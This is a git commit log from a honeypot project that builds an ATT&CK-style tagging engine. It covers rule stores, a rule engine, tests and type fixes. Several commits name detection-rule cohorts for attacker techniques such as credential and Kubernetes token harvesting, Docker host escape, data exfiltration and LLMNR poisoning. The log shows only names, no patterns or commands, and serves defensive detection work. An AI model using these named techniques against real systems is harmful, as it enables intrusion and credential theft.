repository's sub-0.3 drop ensures no fresh tag persists if the
fanout fires accidentally. test_intel_rules.py pins that
zero-confidence invariant.

Marks E.3.8 done in development/TTP_TAGGING.md with the cohort-
split summary.
2026-05-01 09:22:48 -04:00
dc1867315d feat(ttp): E.3.8 R0049-R0053 canary fingerprint cohort
5 YAMLs for the canary-fingerprint cohort per Appendix B / A.9:
navigator.webdriver flag, automation canvas/audio/WebGL hash match,
WebRTC IP leak, TZ/lang vs geo mismatch, platform inconsistency.
CanaryFingerprintLifter (E.3.11) consumes by rule_id.

test_canary_rules.py: YAML-present + inert-in-v0 + xfail(strict)
gated on E.3.11.
2026-05-01 09:21:01 -04:00
1ad15470a1 feat(ttp): E.3.8 R0041-R0048 email cohort
8 YAMLs for the email cohort per Appendix B: open-relay abuse,
mass phishing, phishing-kit X-Mailer signatures, IDN/punycode
URLs, sender masquerade, malicious attachment, BEC, encoded
payload in body. EmailLifter (E.3.12) consumes by rule_id.

test_email_rules.py: YAML-present + inert-in-v0 + xfail(strict)
precision case gated on E.3.12.
2026-05-01 09:19:56 -04:00
806301e179 feat(ttp): E.3.8 R0031-R0040 behavioral cohort
10 YAMLs for the behavioral / cross-event cohort per Appendix B:
beaconing, data destruction, ransom note, web exfil, DB mass-read,
credentials-in-files, k8s SA token harvest, Docker host escape,
LLMNR poisoning, TFTP router-config retrieval.

Every rule is lifter-bound (BehavioralLifter / IdentityLifter) —
the v0 RuleEngine cannot count, aggregate, or compose cross-event
signals, so these YAMLs declare the technique mappings the lifter
will consume by rule_id at E.3.9. Their match specs use a
'kind: lifter:*' shape inert to the regex matcher.

test_behavioral_rules.py asserts each YAML compiles, none fire
from the v0 engine (FP regression guard against a YAML drifting
into a regex), and an xfail(strict=True, reason='impl phase E.3.9')
precision case that will flip green when the lifter lands.
2026-05-01 09:18:27 -04:00
b1fe1f9403 feat(ttp): E.3.8 R0001-R0030 command cohort
30 YAMLs for the shell/command rule cohort per Appendix B (rules/ttp/).
Splits into engine-active (R0007-R0029, regex on command_text /
raw_url / user_agent) and lifter-bound (R0001-R0006, R0030 — the
v0 RuleEngine cannot count auth attempts, do identity rollups, or
parse fingerprint blobs; the BehavioralLifter / IdentityLifter /
CredentialLifter consume them by rule_id at E.3.9 / E.3.13).

test_command_rules.py asserts:
- every R000N has a YAML that compiles
- lifter-bound rules NEVER fire from the v0 engine (regression
  guard against a YAML drifting into a regex match.spec)
- engine-active rules meet their Appendix-C precision target
  against the seed corpus (≥0.95 high-conf, ≥0.80 medium)

Conftest fixes: precision_engine moved to module-scope so module-
scope precomputed dispatch fixture (fired_by_label) can request it;
_RULES_DIR path bumped from parents[2] to parents[3] so the loader
resolves the project root regardless of pytest cwd; make_event
synthesizes attacker_uuid so TTPTag's anchor invariant is satisfied.

Seed corpus broadened: positive examples for every regex rule plus
6 negative examples across innocuous shell verbs (ls, echo, cd, ps,
df, free) so FPs surface in precision rather than passing vacuously.
2026-05-01 09:16:38 -04:00
c635478442 feat(ttp): E.3.8 corpus + harness — labelled holdout fixture
Sub-step preceding the rule-pack commits per TTP_TAGGING.md:2967.
Adds the per-rule precision suite scaffolding under
tests/ttp/rule_precision/:

- conftest.py: precision_engine fixture (RuleEngine populated from
  ./rules/ttp/), corpus_loader (real → seed → empty fallback),
  precision_for() helper for TP/FP accounting.
- _build_corpus.py: extractor for a real prod corpus pull. Mandatory
  --exclude-ip / DECNET_TTP_CORPUS_EXCLUDE_IPS — operator IPs never
  end up in the committed exclusion list. Pulls both 'command' and
  'unknown_command' event types.
- corpus/seed_*.jsonl: synthetic seed rows for each cohort so the
  harness exercises in clean checkouts.
- corpus/*.jsonl (operator-built) is gitignored.
- test_corpus_loads.py: sentinel that every seed file parses.
2026-05-01 09:08:07 -04:00
ed3f340ea8 feat(ttp): E.3.7 RuleEngine — evaluate + atomic-swap watch_store
Implements the rule engine body left empty at contract phase: evaluate()
dispatches by source_kind through self._by_kind, runs the rule's match
spec against event.payload, and emits one TTPTag per emits entry.
watch_store() loads the initial corpus from RuleStore.load_compiled,
then drains subscribe_changes, applying definition changes via
single-statement dict assignment (atomic swap, GIL-atomic to readers)
and state changes via NamedTuple._replace on the existing CompiledRule.

Why: with the FS + DB stores in place (E.3.5/E.3.6), the engine is the
last piece of the rule plane. Lifters (E.3.9–E.3.13) consume the
engine; the worker bootstrap (E.3.14) wires watch_store into the
asyncio event loop. After this commit a CompositeTagger constructed
with a RuleEngine + a populated rules dir will produce real tags.

Notes:
- CompiledRule.emits extended to 4-tuple
  (technique_id, sub_technique_id, tactic, confidence). Tactic + confidence
  ride per-emit so a single rule can carry multiple precision targets
  (the "one event maps to many techniques" property). Compile helpers in
  both backends extract them from the YAML emits dict; missing tactic
  or confidence is a deploy-time error.
- v0 match operator is "pattern" (regex). The field defaults per
  source_kind (command_text / raw_url / subject / verdict / …) and is
  overridable via match.field. Future ops (contains, equals, in_set)
  extend _match_event without touching the engine surface.
- Confidence model: rules with state="clipped" + confidence_max set
  cap the per-emit confidence downward; clipped is a soft suppress, not
  a hard skip. Disabled rules are skipped wholly; expires_at past is
  re-checked at evaluate as defense-in-depth (the store auto-reverts,
  but a racing read between expiry and revert must not fire the rule).
- _span(name, **attrs) helper in engine + both stores short-circuits on
  decnet.telemetry._ENABLED — matches the project's @traced /
  wrap_repository zero-overhead-when-disabled pattern instead of relying
  solely on the no-op tracer indirection.
- Late-bound tracer (telemetry.get_tracer called per-span, not at
  module load) so test_tracing's monkeypatch reaches the production
  code path.

xfails flipped: tests/ttp/test_rule_engine.py multi-emit fan-out +
rule_version-collision-via-engine; tests/ttp/test_multi_mapping.py
N×M engine fan-out + idempotent replay; tests/ttp/test_tracing.py
ttp.eval span hierarchy + ttp.rule.fire span attributes.

Tests: 214 passed, 19 xfailed (gated on E.3.8 lifters / rule pack /
worker bootstrap).
mypy: clean on prod code; pre-existing test-stub arg-type warnings
unchanged.
2026-05-01 08:49:15 -04:00
8a93ee3129 feat(ttp): E.3.6 DatabaseRuleStore — ttp_rule/ttp_rule_state + master sync
Implements the DB-backed rule store body left empty at contract phase:
load_compiled reads from ttp_rule + ttp_rule_state; get_state /
set_state hit ttp_rule_state with the same expires_at auto-revert and
bus-event semantics as the FS backend; subscribe_changes returns a
per-subscriber queue. State persists across process restarts — the
swarm property the FS backend deliberately doesn't have.

Also lands two swarm-mode helpers:
- sync_from_filesystem(fs_store) — master-side, subscribes to a
  FilesystemRuleStore and projects each RuleChange onto a ttp_rule
  upsert/delete.
- tail_db(poll_interval) — worker-side, watermark poll over
  ttp_rule.updated_at; emits RuleChange("definition", ...) for each
  row that moved.

Why: swarm mode needs rule definitions and operator state to
propagate across hosts. The filesystem backend (E.3.5) was the
single-host-dev variant; this one survives restart and serves N
workers from a shared DB.

Notes:
- DatabaseRuleStore() with no args lazy-inits an in-memory SQLite
  repo so the conformance fixture works without test plumbing. In
  production the worker bootstrap (E.3.14) passes an explicit repo.
- The conftest.py rule_store fixture became async (pytest_asyncio),
  per-backend creates/initializes a SQLite repo for the DB run.
- Adds a `seed_rule(store, rule_id, yaml)` helper to bridge backend
  semantics: drop a YAML file (FS) vs insert a ttp_rule row (DB).
  Used by the parametrized load_compiled conformance test.
- Late-bound _tracer() in both backends (was module-level get_tracer
  binding) so test_tracing's monkeypatch of decnet.telemetry.get_tracer
  actually affects span output.

xfails flipped: tests/ttp/store/test_database.py set_state-writes-to-
ttp_rule_state + filesystem-to-DB sync; tests/ttp/store/test_conformance.py
DB-side load_compiled / set_state isolation / round-trip / per-rule
fan-out / expired-state revert / set_state failure / get_state default
(was xfail-only-on-DB);  tests/ttp/test_tracing.py set_state span
hierarchy.

Tests: 208 passed, 25 xfailed (gated on E.3.7 + lifters).
mypy: clean on all touched files.
2026-05-01 08:39:46 -04:00
f41995a229 feat(ttp): E.3.5 FilesystemRuleStore — inotify hot-reload + per-rule events
Implements the filesystem-backed rule store body left empty at contract
phase: YAML parse + Pydantic validation, asyncinotify watch over
./rules/ttp/, in-process state cache with auto-revert on expires_at,
and a subscribe_changes() async iterator yielding one RuleChange per
per-rule edit. Bus topic builders ttp_rule_reloaded / ttp_rule_state
ship alongside.

Why: the rule plane needed a store before the engine (E.3.7) could
consume RuleChange events and atomically swap compiled rules into its
dispatch index.

Notes:
- Linux-only by construction (asyncinotify wheel gated by sys_platform
  marker; FilesystemRuleStore.__init__ raises on non-Linux).
- Filename allowlist is the FIRST check on every inotify event.
- Content-hash dedup so a single write firing IN_CREATE + IN_CLOSE_WRITE
  produces exactly one RuleChange.
- All compile work serializes on a single asyncio.Lock.
- Subscribers register their queue eagerly so events fired between
  subscribe_changes() and the first __anext__() are buffered.

xfails flipped: per-save-style + filter-ordering + atomic-swap in
test_filesystem.py; load_compiled / set_state isolation / round-trip /
per-rule fan-out / expired-state revert / set_state failure semantics
in test_conformance.py (FS side; DB side stays xfail until E.3.6);
malformed-YAML compile-time check in test_rule_engine.py.

Tests: 197 passed, 35 xfailed (gated on E.3.6 / E.3.7 / lifters).
mypy + bandit: clean on all touched files.

Wiki update for the per-rule reload + state-change topics lands in a
matching wiki-checkout/Service-Bus.md edit (separate repo).
2026-05-01 08:31:05 -04:00
89ce893792 feat(ttp): E.3.4 API handlers wired to repo (rollups + Navigator)
Five GET rollup endpoints (techniques, by-identity, by-attacker,
by-campaign, by-session) and the Navigator export (fleet +
per-identity) now call into the TTPMixin methods. Rule catalogue
endpoint still returns [] — backed by the RuleStore which lands
at E.3.5/E.3.6.
2026-05-01 08:06:53 -04:00
fee697694d feat(ttp): E.3.3 repository — insert_tags + listing rollups (dual backend)
Dialect-split: portable rollup queries on TTPMixin; bulk insert with
ON CONFLICT DO NOTHING / INSERT IGNORE in the per-dialect repos.
Confidence-floor (< 0.3) drop applied at mixin layer before the
dialect hook. BaseRepository now declares the six TTP methods abstract.

Tests in tests/web/db/test_ttp_repo.py flipped from pytest.fail stubs
to real dual-backend behavioral tests; tests/ttp/test_confidence.py
drop-below-floor xfail removed.
2026-05-01 08:04:46 -04:00
226b3adfa2 docs(ttp): mark E.3.1 + E.3.2 done — schema/bus verification 2026-05-01 07:57:38 -04:00
3664ea7008 docs(ttp): mark E.2.9–E.2.14b as done in design doc
Each section gets a Status:  done block summarising what's GREEN
today vs xfail-gated and noting any divergence from the doc's
original wording (E.2.9 lossy observable phases; E.2.13 db_backends
fixture landed alongside; E.2.14a Jaeger-skip + tracing-enabled
plumbing; E.2.14b NamedTuple AttributeError vs FrozenInstanceError).
2026-05-01 07:47:01 -04:00
0217319423 test(ttp): E.2.14b RuleStore conformance — cross-backend + filesystem-specific + database-specific
tests/ttp/store/conftest.py — parametrized rule_store fixture over
FilesystemRuleStore (skipped on non-Linux) + DatabaseRuleStore.

test_conformance.py — shared assertions (default-state, set_state
isolation/round-trip, subscribe_changes per-rule fan-out, expires_at
auto-revert, set_state failure semantics) parametrize over both.
get_state-default GREEN today on FS (returns RuleState() for empty
cache); rest xfail-gated behind E.3.5/E.3.6.

test_filesystem.py — inotify mask + canonical kernel values + 9
scratch-filename rejections + 4 valid-filename acceptances +
fullmatch anchor + tmp_path construction + CompiledRule frozen
property GREEN today; per-save-style + filter-ordering +
atomic-swap concurrency xfail-gated.

test_database.py — class-level surface (no platform guard, ABC
methods concrete, async coroutines) GREEN today; ttp_rule_state
write + filesystem→DB sync xfail-gated behind E.3.6.
2026-05-01 07:45:32 -04:00
bf5414c0d1 test(ttp): E.2.14a follow-up — force DECNET_DEVELOPER_TRACING=true, skip when Jaeger unreachable
Session-scoped autouse fixture in tests/ttp/conftest.py sets
DECNET_DEVELOPER_TRACING=true and forces decnet.telemetry._ENABLED
so the no-op tracer doesn't silently swallow emitted spans. The
span_exporter fixture also monkeypatches decnet.telemetry.get_tracer
so production code under test lands spans in the in-memory
exporter. Tracing tests skip when DECNET_OTEL_ENDPOINT (default
localhost:4317) isn't reachable so the dev loop stays green
without lying about coverage.
2026-05-01 07:42:22 -04:00
f4fe6fe6e4 test(ttp): E.2.14a observability tracing — span hierarchy + no-PII property
In-memory span exporter fixture wired to a per-test TracerProvider
(OTEL global is locked once set, so each test gets its own).
ttp.eval / ttp.lifter.{name} / ttp.rule.fire / ttp.rule.state.change
hierarchy + no-PII canary battery xfail-gated behind E.3.5–E.3.13.
2026-05-01 07:40:58 -04:00
4a93e16407 test(ttp): E.2.13 repository tests — TTPMixin idempotency + identity-rollup projection on dual backends
Adds tests/web/db/conftest.py with a db_backends fixture
parametrizing SQLite (always) + MySQL (gated on
DECNET_TEST_MYSQL_URL). Surface assertions (mixin methods present
+ async) GREEN today; insert_tags idempotency, identity rollup
projection, attacker-rollup exclusion of NULL-attacker tags
xfail-gated behind E.3.3.
2026-05-01 07:39:16 -04:00
6814949bc0 test(ttp): E.2.12 worker bus integration — _TOPICS equality, loop-prevention, delivery asymmetry
Pin _TOPICS frozenset against documented set (single source of
truth). Worker→engine invocation, loop-prevention invariant,
attacker.enriched/email.received catch-up asymmetry xfail-gated
behind E.3.14.
2026-05-01 07:37:58 -04:00
c276b5696e test(ttp): E.2.11 multi-mapping property — N×M fan-out, idempotent UUID, replay-safety
Hypothesis property: N rule_ids × M technique_ids on one event yield
N×M distinct tag UUIDs. Worked example pinned: one rule emitting
(T1110, None) and (T1078, None) → two distinct UUIDs. Engine-level
fan-out + replay xfail-gated behind E.3.7.
2026-05-01 07:36:19 -04:00
fd81be0bb1 test(ttp): E.2.10 confidence model — downward-only multiplier property, drop-below-0.3, AbuseIPDB-30 worked example
Pure-arithmetic adjustment formula pinned via Hypothesis property
test (multiplier ∈ [0,1] cannot raise base). Drop-at-floor and
provider-score multiplier xfail-gated behind E.3.3 / E.3.10.
2026-05-01 07:34:58 -04:00
79e6df8343 test(ttp): E.2.9 UKC bridge bijection — pin tactic↔phase mapping, observable round-trip, lossy phases
Pre-target phases (RECONNAISSANCE/RESOURCE_DEVELOPMENT/WEAPONIZATION/
SOCIAL_ENGINEERING) and observable-but-unmappable phases (EXPLOITATION/
PIVOTING/OBJECTIVES, UKC-only concepts ATT&CK lacks tactics for) are
pinned as lossy via _LOSSY_INVERSE_REFERENCE so a future contributor
cannot 'fix' the asymmetry without tripping the suite.
2026-05-01 07:33:47 -04:00
bcd1f14cd3 feat(ttp): E.1.11 RuleStore contract — base ABC, factory, filesystem + database stubs
Adds decnet/ttp/store/ subpackage:
- base.py: RuleState frozen dataclass, RuleChange NamedTuple, RuleStore ABC
- factory.py: get_rule_store() reading DECNET_TTP_RULE_STORE_TYPE
- impl/filesystem.py: FilesystemRuleStore with sys.platform=='linux'
  fail-fast guard, allowlist filename regex, raw inotify mask bits
  (lib import deferred to E.3 so contract phase compiles without the
  asyncinotify dep installed)
- impl/database.py: DatabaseRuleStore stub (no platform guard)

TTPRule + TTPRuleState SQLModels were already shipped at E.1.1; this
commit closes the type-only TYPE_CHECKING forward-ref in
rule_engine.py via real runtime imports through the new package.
2026-05-01 07:25:09 -04:00
b6e31e64e9 feat(ttp): E.1.10 repository contract — TTPMixin with insert_tags + list_techniques_by_{identity,attacker,campaign,session} + list_distinct_techniques
Empty NotImplementedError bodies; the SQL lands at E.3 implementation.
Mixin composed onto SQLModelRepository alongside the existing domain
mixins. Dialect-specific INSERT-OR-IGNORE syntax overrides land in
the per-backend subclasses at E.3 per the dual-DB-backend convention.
2026-05-01 07:21:37 -04:00
b7f206c8c5 feat(ttp): E.1.9 API contract — seven router endpoints, admin-gated state mutations, response models
Mounts /api/v1/ttp/* with empty-list / empty-Navigator responses.
GET endpoints viewer-gated; POST/DELETE /rules/{rule_id}/state
admin-gated server-side. POST parses JSON manually so a malformed
body returns the documented 400 (per feedback_schemathesis_400).

Drops xfail-strict markers from E.2.8 tests now that the router is
mounted; 26 tests pass against the contract handlers.
2026-05-01 07:20:13 -04:00
cfbfaabfcd feat(ttp): E.1.8 UKC bridge contract — ATTACK_TACTIC_TO_UKC + tactic_to_ukc_phase + inverse 2026-05-01 07:12:00 -04:00
b5a19301a2 test(ttp): E.2.8 API shape + auth — GET 200/401 + admin-only POST/DELETE 401/403/200/400 contract 2026-05-01 07:00:41 -04:00
0cdf8d90da test(ttp): E.2.7 decoupling lint — TTP code may not import decnet.intel.* providers or decnet.profiler.keystroke 2026-05-01 06:58:12 -04:00
e2078c868d test(ttp): E.2.6 lifter tolerates absence — six lifters return [] on empty joins, no ERROR logs 2026-05-01 06:57:29 -04:00
1ffaa3df41 test(ttp): E.2.5 RuleEngine behavior — empty store, malformed YAML, multi-emit fan-out, version collisions 2026-05-01 06:56:28 -04:00
5accf8f1b1 test(ttp): E.2.4 Tagger ABC conformance — hypothesis fuzz over swallowed Exception types 2026-05-01 06:54:29 -04:00
cce84f23dc test(bus): E.2.3 TTP topic naming — constants, builders, wildcard match 2026-05-01 06:53:05 -04:00
e58aa4fe3a test(ttp): E.2.2 idempotency — determinism, golden value, replay-safety signature lock 2026-05-01 06:45:49 -04:00
e6f1da2344 test(ttp): E.2.1b evidence shape — TypedDict keys, PII §6 type-level assertion 2026-05-01 06:45:35 -04:00
c3a799726f test(ttp): E.2.1 schema invariant tests — CHECK, ValueError guard, UUIDv5, JSON round-trip 2026-05-01 06:44:57 -04:00
19cc8aa859 feat(ttp): E.1.7 worker contract — run_ttp_worker_loop, _TOPICS, registry entry 2026-05-01 06:33:34 -04:00
208ffd8f4f feat(ttp): E.1.6 per-lifter contracts — six TolerantTagger subclasses 2026-05-01 06:31:31 -04:00
cb9d183c20 feat(ttp): E.1.5 RuleEngine contract — CompiledRule, RuleSchema, RuleEngine ABC 2026-05-01 06:30:12 -04:00
a703f9eda7 docs(ttp): mark E.1.3 and E.1.4 as done in design doc 2026-05-01 06:22:08 -04:00
c3c5813211 feat(ttp): E.1.3+E.1.4 Tagger ABC and composite factory contract
Third and fourth TTP-tagging contract commits, plus a scoped subset
of the E.2.4 conformance tests covering the contract surface shipped
here (full hypothesis-fuzz suite still lands with E.2.4).

E.1.3 — decnet/ttp/base.py
- TaggerEvent NamedTuple: source_kind, source_id, attacker_uuid,
  identity_uuid, session_id, decky_id, opaque payload.
- Tagger(ABC) with abstract async tag(); class-level name and
  HANDLES: frozenset[str] (default empty so a misconfigured subclass
  is loudly idle, not loudly noisy).
- TolerantTagger(Tagger): concrete tag() wraps abstract _tag_impl()
  in try/except Exception (deliberately not BaseException — so
  KeyboardInterrupt / SystemExit / asyncio.CancelledError propagate
  and the worker can shut down cleanly). Swallowed exceptions log
  at WARNING with exc_info, never ERROR — absence is the steady
  state, not a bug. Subclasses override _tag_impl, never tag — the
  tolerance contract is enforced in the base class, not on trust.
- KNOWN_SOURCE_KINDS: Final[frozenset[str]] enumerating every
  source_kind a producer is allowed to emit. Closed-by-enumeration
  at the runtime layer; the composite tagger keys its WARNING/INFO
  bridge off this constant to surface the silent-drop trap from
  the design doc (lines 160–195).

E.1.4 — decnet/ttp/factory.py
- get_tagger() reads DECNET_TTP_TAGGER_TYPE (default 'composite');
  unknown values raise ValueError with the known-list. Mirrors
  decnet.intel.factory and decnet.clustering.factory.
- _KNOWN = ('composite',). Per-lifter classes (E.1.6) are children
  of the composite, not standalone tagger types.
- CompositeTagger(Tagger): pre-computes a dict[str, list[Tagger]]
  dispatch index from each lifter's HANDLES; fans events out
  concurrently with asyncio.gather and concatenates results.
  Empty lifters=[] is the legal contract-phase state — E.1.6
  wires the real lifters in.
- Unhandled-event observability: source_kind in KNOWN_SOURCE_KINDS
  but no lifter claims it -> WARNING once per kind per process
  (missed E.1.6 update). Unknown kind -> INFO once per kind per
  process (future-feature telemetry, by design). Per-process dedup
  via plain set; E.1.6 may swap in a proper rate-limiter once
  production traffic shapes are known.

Tests — tests/ttp/test_base.py, tests/ttp/test_factory.py
- Tagger / TolerantTagger abstractness, missing-tag-impl rejection,
  WARNING-not-ERROR log level, propagation of KeyboardInterrupt /
  SystemExit / asyncio.CancelledError.
- Factory env-var routing, unknown-name ValueError, dispatch-index
  correctness, only-claiming-lifter invocation, WARNING-once for
  known-but-unclaimed kinds, INFO-once for unknown kinds, result
  concatenation across lifters.

Mypy clean under .311/bin/mypy --ignore-missing-imports.
2026-05-01 06:20:10 -04:00
e395306dcb feat(ttp): E.1.2 bus topic contract — TTP_TAGGED, TTP_RULE_FIRED, TTP_RULE_SUPPRESSED, EMAIL_RECEIVED
Second TTP-tagging contract commit. Constants only — no publishers,
no subscribers, no tests. (E.2.3 ships the bus-topic naming tests.)

- New roots: EMAIL, TTP.
- New leaves: EMAIL_RECEIVED ('received', single-token under EMAIL),
  TTP_TAGGED ('tagged'), TTP_RULE_FIRED ('rule.fired'),
  TTP_RULE_SUPPRESSED ('rule.suppressed'). Per-rule reload + state
  topics ship with the RuleStore (E.1.11) — co-located with
  producer.
- New builders: email_topic(event_type), ttp(event_type),
  ttp_rule_fired(technique_id). The ttp_rule_fired builder validates
  technique_id as a single segment so sub-techniques like T1110.001
  are rejected at construction; topic key is the parent technique,
  sub_technique lives in the payload.
- email_topic is named with the _topic suffix to avoid shadowing the
  Python email stdlib at import sites that pull both.
- TTP_TAGGING.md E.1.2 entry corrected: the spec referenced
  'ATTACKER_ENRICHED' but the actual constant is
  ATTACKER_INTEL_ENRICHED ('intel.enriched'). The existing constant
  covers the design intent (TTP intel_lifter wakes on
  attacker.intel.enriched). No rename — would break every existing
  subscriber.

Wiki update for the four new topics ships in a sibling commit in
wiki-checkout (separate repo per project layout).
2026-05-01 06:08:11 -04:00
ce7efdfdd2 feat(ttp): E.1.1 schema contract — TTPTag, TTPRule, TTPRuleState, evidence TypedDicts, compute_tag_uuid
First contract commit of TTP tagging. Shapes only — no behavior.

- TTPTag SQLModel: deterministic UUIDv5 PK; (source_kind, source_id)
  discriminated provenance; nullable attacker_uuid + identity_uuid
  with ON DELETE CASCADE; native sqlalchemy.JSON evidence column;
  required attack_release; CheckConstraint('attacker_uuid IS NOT
  NULL OR identity_uuid IS NOT NULL'); composite indexes for the
  primary query patterns (identity_uuid+technique_id,
  attacker_uuid+technique_id, technique_id+created_at); __init__
  guard raising ValueError with both anchor names in the message
  (belt-and-braces for MySQL <8.0.16 where CHECK is silent).
- compute_tag_uuid(): RFC-4122 UUIDv5 over the six tag-identity
  fields under a fixed _TTP_TAG_NS. Pure, deterministic, replay-safe.
- Per-source_kind evidence TypedDicts (CommandEvidence,
  IntelEvidence, EmailEvidence, CanaryFingerprintEvidence) — PII
  rule lives in the type: EmailEvidence has no field for raw rcpt
  addresses or body bytes.
- TTPRule + TTPRuleState tables for the DatabaseRuleStore (E.1.11).
- All symbols re-exported from decnet.web.db.models per the
  package's existing convention.

Tests for invariants (CHECK behavior, evidence round-trip across
SQLite+MySQL, idempotency property, init-guard ordering) land in
E.2.1/E.2.2 with xfail-strict markers per Appendix E discipline.
2026-05-01 06:03:45 -04:00
d09764beec docs(ttp): add TTP tagging design (order-of-work step 1)
Pre-implementation spec for the TTP-tagging worker. Defines the
ATT&CK-canonical vocabulary, schema (ttp_tag + ttp_rule[_state]),
bus topics, worker shape, lifter layering (rule-based v0,
behavioral/intel/email v0.5, sigma/biometric later), confidence
model, API surface, UI surface, observability, performance targets,
and a CDD plan (Appendix E) that splits contracts from tests with
xfail discipline so CI stays green between steps.
2026-05-01 06:02:56 -04:00
9e003d3acd Merge branch 'merge-rehearsal' into dev
# Conflicts:
#	decnet/templates/postgres/server.py
#	decnet/templates/rdp/Dockerfile
#	decnet/templates/redis/Dockerfile
#	decnet/templates/smtp/Dockerfile
#	decnet/templates/smtp/entrypoint.sh
#	decnet/templates/snmp/Dockerfile
#	decnet/templates/snmp/entrypoint.sh
#	decnet/templates/tftp/Dockerfile
#	decnet/templates/tftp/entrypoint.sh
#	decnet/templates/vnc/Dockerfile
#	decnet/templates/vnc/entrypoint.sh
#	templates/rdp/Dockerfile
#	templates/smb/Dockerfile
#	templates/smtp/Dockerfile
#	templates/smtp/entrypoint.sh
#	templates/snmp/Dockerfile
#	templates/snmp/entrypoint.sh
#	templates/tftp/Dockerfile
#	templates/tftp/entrypoint.sh
#	templates/vnc/Dockerfile
#	tests/services/test_smtp_relay.py
2026-05-01 02:27:20 -04:00
776861a1b7 fix(types): T7 — eliminate all remaining 38 mypy errors; fix DeckyRow subscript in engine tests 2026-05-01 02:19:53 -04:00
bd50b0d8b2 fix(types): T6 — suppress scapy attr-defined on lazy imports in tcpfp.py 2026-05-01 02:19:00 -04:00
f6e67c036d fix(types): T5 — narrow AsyncClient|None with inline if; rename loop variable t→task to avoid no-redef 2026-05-01 02:18:57 -04:00
d187304e99 fix(types): T4 — stop spreading TopologySummary as dict; fix heartbeat .get() and scope param 2026-05-01 02:18:55 -04:00
0f90dcfd3e fix(types): T3 — narrow str|None at 12 sites; fix LANRow/DeckyRow subscript in mutator tests 2026-05-01 02:18:53 -04:00
65a2bdf0e7 fix(types): T2 — add missing method stubs to BaseRepository; fix get_logs/add_lan/edge/decky signatures 2026-05-01 02:18:45 -04:00
ed6263a53d fix(types): T1 — remove 15 stale type: ignore comments confirmed unused by mypy 2026-05-01 02:18:40 -04:00
ee24a7551f fix(types): T7 — eliminate all remaining 38 mypy errors; fix DeckyRow subscript in engine tests 2026-05-01 02:07:53 -04:00
7e4da95091 fix(types): T6 — suppress scapy attr-defined on lazy imports in tcpfp.py 2026-05-01 01:53:59 -04:00
b9684254f0 fix(types): T5 — narrow AsyncClient|None with inline if; rename loop variable t→task to avoid no-redef 2026-05-01 01:53:10 -04:00
e387acf79d fix(types): T4 — stop spreading TopologySummary as dict; fix heartbeat .get() and scope param 2026-05-01 01:51:43 -04:00
d637ff515e fix(types): T3 — narrow str|None at 12 sites; fix LANRow/DeckyRow subscript in mutator tests 2026-05-01 01:47:04 -04:00
502ac42518 fix(types): T2 — add missing method stubs to BaseRepository; fix get_logs/add_lan/edge/decky signatures 2026-05-01 01:28:50 -04:00
f597ab2810 fix(types): T1 — remove 15 stale type: ignore comments confirmed unused by mypy 2026-05-01 01:26:24 -04:00
19271f9319 fix(types): P3 — annotate transport in all template protocol servers; 0 errors in templates/
- asyncio.Protocol (TCP): _transport: asyncio.Transport | None = None + cast() in
  connection_made; assert guards in every method that directly accesses the field.
  Files: pop3, smtp, mqtt, postgres, mssql, mongodb, imap, ldap, redis, mysql, sip, vnc.
- asyncio.DatagramProtocol (UDP): _transport: asyncio.DatagramTransport | None = None.
  Files: snmp, tftp, SIPUDPProtocol.
- RDP: assert new_transport is not None after start_tls() to narrow Transport | None.
- FTP (Twisted): assert self.transport is not None + targeted type: ignore for imprecise
  Twisted stubs (misc/override/arg-type/attr-defined), IReactorTCP cast for listenTCP.
- conpot: proc.stdout is None guard before iteration.
- Bonus fixes surfaced by annotation:
  - smtp: get_payload(decode=True) bytes narrowing (arg-type on sha256)
  - postgres: rename shadowed `msg` param to `err_msg` in _handle_startup
  - mongodb: base64.binascii.Error → import binascii; binascii.Error
  - imap: result: list[int] = [] (var-annotated)
2026-05-01 01:09:14 -04:00
52b5074149 chore(types): P2 — mark sqlmodel_repo complete in STATIC-TYPES.md 2026-05-01 00:50:00 -04:00
614780f144 fix(types): P2 — wire _MixinBase + col() across sqlmodel_repo; suppress pydantic/SQLModel column typing false positives
- Add _MixinBase abstract class to _helpers.py: declares _session(),
  _deserialize_attacker(), _assert_pending(), _check_and_bump_version(),
  and list_running_topology_deckies() so mypy can see cross-mixin contracts
- Add _require(val, msg) helper for narrowing T | None → T
- Inherit _MixinBase in all 26 leaf mixin classes
- Wrap SQLAlchemy column method calls (.is_(), .like(), .notin_(), .in_(),
  .contains()) with col() from sqlmodel — fixes attr-defined false positives
  caused by pydantic plugin typing class-level fields as Python value types
- Wrap select(Model.field) with select(col(Model.field)) for column projections
- Add pyproject.toml [[tool.mypy.overrides]] to disable arg-type in
  sqlmodel_repo.*: pydantic plugin resolves .where(Model.field == v) as
  where(bool), a false positive; call-arg still catches real argument errors
- Remove 9 stale # type: ignore comments (logging, helpers, credentials)
- Fix telemetry.py traced() overload no-redef + misc
- Fix logs.py datetime/str operator and nullable PK comparison with col()
- sqlmodel_repo/ now has 0 mypy errors
2026-05-01 00:49:18 -04:00
d777a1c4e0 chore(types): P1 — mark all P1 items complete in STATIC-TYPES.md 2026-05-01 00:23:30 -04:00
9cf7bc5aab fix(types): P1 — remove 2 stale type: ignore[no-untyped-def] in clustering adapters 2026-05-01 00:22:33 -04:00
5a240a3d55 fix(types): P1 — widen _send_json data param to dict | list in elasticsearch server 2026-05-01 00:22:16 -04:00
05cdd72d51 fix(types): P1 — annotate ranges: list[Range] in geoip/rir and asn/iptoasn providers 2026-05-01 00:21:44 -04:00
6f8f2ed573 fix(types): P1 — type: ignore[abstract] for plugin-discovery cls() call in registry 2026-05-01 00:21:09 -04:00
23caa86266 fix(types): P1 — pydantic.mypy plugin, types-PyYAML stub, pin mypy<1.20 2026-05-01 00:20:54 -04:00
909913e912 fix(types): P0 mypy — explicit binascii import, drop dead or None in ntlmssp
syslog_bridge.py: base64.binascii is not a public mypy-visible attribute;
import binascii directly and reference binascii.Error at the except clause.
Propagated to all 26 template subdirectory copies (all were drift-free).

ntlmssp.py: `principal = username or None` widened the type to str | None
for no runtime reason — _decode_str() always returns str.  Drop the `or None`.
Propagated to smb/ and rdp/ copies.

762 → 722 mypy errors (-40).
2026-05-01 00:09:00 -04:00
fc1f0914b7 refactor(topology): introduce TopologyRepository protocol with DTO return types
Replace repo: BaseRepository with a structural TopologyRepository protocol
in persistence.py and allocator.py. All read methods now return typed DTOs
(TopologySummary, LANRow, DeckyRow, EdgeRow) instead of raw dicts, eliminating
silent field-shape regressions across the topology subsystem.

TopologySummary gains email_personas and language_default so api_personas.py
can continue reading those fields via attribute access. hydrate() converts
DTOs to dicts before passing to _backfill_decky_configs, keeping the mutable
